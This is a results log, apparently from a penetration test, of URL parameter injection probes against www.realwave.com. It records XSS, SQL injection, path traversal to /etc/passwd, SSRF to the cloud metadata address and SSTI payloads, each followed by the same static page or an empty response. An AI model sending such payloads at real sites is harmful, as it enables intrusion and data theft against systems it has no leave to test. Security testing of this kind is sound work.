jake/clawdbot-workspace
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
clawdbot-workspace/pentest-realwave/phase1-results.txt

255 lines
6.6 KiB
Plaintext
Raw Blame History

=== PHASE 1: URL PARAMETER INJECTION ===
--- Test: q_xss ---
URL: https://www.realwave.com/?q=<script>alert(1)</script>
HTTP Code: 200
Response Headers:
HTTP/2 200
content-length: 63342
content-type: text/html
last-modified: Thu, 05 Feb 2026 22:26:03 GMT
accept-ranges: bytes
etag: "1dc96ee6976f8ee"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:44:59 GMT
Response Body (first 500 chars):
<!DOCTYPE html>
<html lang="en" data-critters-container>
<head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-70DG95YYYQ"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'G-70DG95YYYQ');
</script>
<meta charset="utf-8">
<title>RealWave AI</title>
<base href="/">
<meta name="viewport" content="width
=========================================
--- Test: redirect_js ---
URL: https://www.realwave.com/?redirect=javascript:alert(1)
HTTP Code: 200
Response Headers:
HTTP/2 200
content-length: 63342
content-type: text/html
last-modified: Thu, 05 Feb 2026 22:26:03 GMT
accept-ranges: bytes
etag: "1dc96ee6976f8ee"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:44:59 GMT
Response Body (first 500 chars):
<!DOCTYPE html>
<html lang="en" data-critters-container>
<head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-70DG95YYYQ"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'G-70DG95YYYQ');
</script>
<meta charset="utf-8">
<title>RealWave AI</title>
<base href="/">
<meta name="viewport" content="width
=========================================
--- Test: callback_img ---
URL: https://www.realwave.com/?callback=<img+src=x+onerror=alert(1)>
HTTP Code: 200
Response Headers:
HTTP/2 200
content-length: 63342
content-type: text/html
last-modified: Thu, 05 Feb 2026 22:26:03 GMT
accept-ranges: bytes
etag: "1dc96ee6976f8ee"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:00 GMT
Response Body (first 500 chars):
<!DOCTYPE html>
<html lang="en" data-critters-container>
<head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-70DG95YYYQ"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'G-70DG95YYYQ');
</script>
<meta charset="utf-8">
<title>RealWave AI</title>
<base href="/">
<meta name="viewport" content="width
=========================================
--- Test: search_svg ---
URL: https://www.realwave.com/?search=<svg/onload=alert(1)>
HTTP Code: 200
Response Headers:
HTTP/2 200
content-length: 63342
content-type: text/html
last-modified: Thu, 05 Feb 2026 22:26:03 GMT
accept-ranges: bytes
etag: "1dc96ee6976f8ee"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:02 GMT
Response Body (first 500 chars):
<!DOCTYPE html>
<html lang="en" data-critters-container>
<head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-70DG95YYYQ"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'G-70DG95YYYQ');
</script>
<meta charset="utf-8">
<title>RealWave AI</title>
<base href="/">
<meta name="viewport" content="width
=========================================
--- Test: id_sqli ---
URL: https://www.realwave.com/?id=1%27%20OR%201=1--
HTTP Code: 200
Response Headers:
HTTP/2 200
content-length: 63342
content-type: text/html
last-modified: Thu, 05 Feb 2026 22:26:03 GMT
accept-ranges: bytes
etag: "1dc96ee6976f8ee"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:03 GMT
Response Body (first 500 chars):
<!DOCTYPE html>
<html lang="en" data-critters-container>
<head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-70DG95YYYQ"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'G-70DG95YYYQ');
</script>
<meta charset="utf-8">
<title>RealWave AI</title>
<base href="/">
<meta name="viewport" content="width
=========================================
--- Test: page_lfi ---
URL: https://www.realwave.com/?page=../../../../etc/passwd
HTTP Code: 200
Response Headers:
HTTP/2 200
content-length: 63342
content-type: text/html
last-modified: Thu, 05 Feb 2026 22:26:03 GMT
accept-ranges: bytes
etag: "1dc96ee6976f8ee"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:03 GMT
Response Body (first 500 chars):
<!DOCTYPE html>
<html lang="en" data-critters-container>
<head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-70DG95YYYQ"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'G-70DG95YYYQ');
</script>
<meta charset="utf-8">
<title>RealWave AI</title>
<base href="/">
<meta name="viewport" content="width
=========================================
--- Test: url_ssrf ---
URL: https://www.realwave.com/?url=http://169.254.169.254/latest/meta-data/
HTTP Code: 200
Response Headers:
HTTP/2 200
content-length: 63342
content-type: text/html
last-modified: Thu, 05 Feb 2026 22:26:03 GMT
accept-ranges: bytes
etag: "1dc96ee6976f8ee"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:04 GMT
Response Body (first 500 chars):
<!DOCTYPE html>
<html lang="en" data-critters-container>
<head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-70DG95YYYQ"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'G-70DG95YYYQ');
</script>
<meta charset="utf-8">
<title>RealWave AI</title>
<base href="/">
<meta name="viewport" content="width
=========================================
--- Test: template_ssti ---
URL: https://www.realwave.com/?template={{7*7}}
HTTP Code:
Response Headers:
Response Body (first 500 chars):
=========================================
Reference in New Issue View Git Blame Copy Permalink